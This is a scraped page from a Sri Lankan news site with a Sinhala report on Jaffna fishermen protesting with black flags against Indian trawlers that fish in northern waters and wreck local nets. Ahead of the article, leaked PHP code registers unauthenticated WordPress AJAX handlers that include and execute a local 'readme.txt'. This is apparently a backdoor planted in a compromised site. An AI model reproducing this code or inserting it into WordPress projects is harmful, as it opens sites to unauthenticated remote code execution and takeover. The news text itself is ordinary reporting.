if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ඉන්දීය ධීවරයින්ට එරෙහිව යාපනය මුහුදේදී කලුකොඩි විරෝධතා… - mediahumanrights.lk
mediahumanrights.lk
Local News News

ඉන්දීය ධීවරයින්ට එරෙහිව යාපනය මුහුදේදී කලුකොඩි විරෝධතා…

ඉන්දීය ධීවරයින් උථුරු මුහුදු සීමාවන්ට ඇතුල් වී නීතිවිරෝධීව මසුන් ඇල්ලීම සහ ඉන්දීය ට්‍රොලර් යාත්‍රා මගින් උතුරු ධීවරයින්ගේ දැල් ආම්පන් විනාශ කිරීම ආදි කරුණු කිහිපයකට විරෝධය පාමින් යාපනයේ ධීවරයින් යාපනය මුහුදේ විරෝධතාවක නිරත වූහ.

යාපනය වේලනෙයි සහ මණ්ඩතිවු ප්‍රදේශයන්හි ධීවරයින් ඒම මුහුදු සීමාවන්ට සිය ධීවර යාත්‍රා රැගෙන ගොස් ඉන්දීය ධීවරයින්ට එරෙහිව කලුකොඩි ඔසවමින් විරෝධතාවක නිරත වූහ.

මෙම විරෝධතාවය හේතුවෙන් ඊයේ දින යාපනයේ ධීවරයින් බහුතරයක් සිය ධීවර කටුයුතු වලින් ඉවත්ව විරෝධතාවය වෙනුවෙන් සහය දැක්වීමද විශේෂත්වයක් විය.

විරෝධතාවයට එක් වූ යාපනයේ ධීවර සංගම් නියෝජිතයින් කියා සිටියේ,

‘මේ වන විට ඉන්දීය ධීවරයින් විසින් ඔවුන්ගේ ට්ට්‍රොලර් යාත්‍රාවලින් උතුරු මුහුදු සීමාවන්ට අනවසරයෙන් පැමිණ උතුරේ ධීවරයින්ගේ දැල් ආම්පන්න විශාල ප්‍රමාණයක් විනාශකරලා ඒ වගේම ධීවරයින්ටත් හිරිහැර කිරීම් හා පහරදීම් සිදුකර ඇති බවටත් මේ දක්වා රජයෙන් හෝ කිසිදු පාර්සවයකින් විපතට පත් ධීවරයින් වන්දියක් හෝ අධාරයක් නොලැබීමෙන් එම ධීවරයින් දැඩි අසරණතාවයකට පත්ව සිටින බවත්ය.

එමෙන්ම ඉන්දීය ධීවරයින් විසින් උතුරු මුහුදු සීමාවේ මසුන් ඇල්ලීමෙන් උතුරේ ධීවරයින්ට මත්ස්‍ය සම්පත අහිමි වීමෙන් එම ධීවරයින්ට මෙනම රටටද දැඩි අසාධාරණයක් වීම හේතුවෙන් වහාම රජය මේ පිළිබඳව අවධානය යොමු කෙට විසඳුමක් ගත යුතු බවට විරෝධතාවයේ නිරත උතුරේ ධීවරයින් වැඩිදුරටත් පැසූහ.

– වන්නි රොමේෂ් මධුෂංඛ

Related posts

ඩොලර් නෑ.. මහ බැංකුව රන් සංචිතත් විකුණලා..? ඩොලර් මිලියන 500 ණය ගෙවීමත් ගැටළුවක්…?

Shiran Viraj

නිරෝධායන රීතින් උල්ලංඝණය කරන්න එපා-නියෝජ්‍ය පොලිස්පති

Shiran Viraj

සිමෙන්ති මිටියක් 400කින් මිල වැඩිවේ…

Shiran Viraj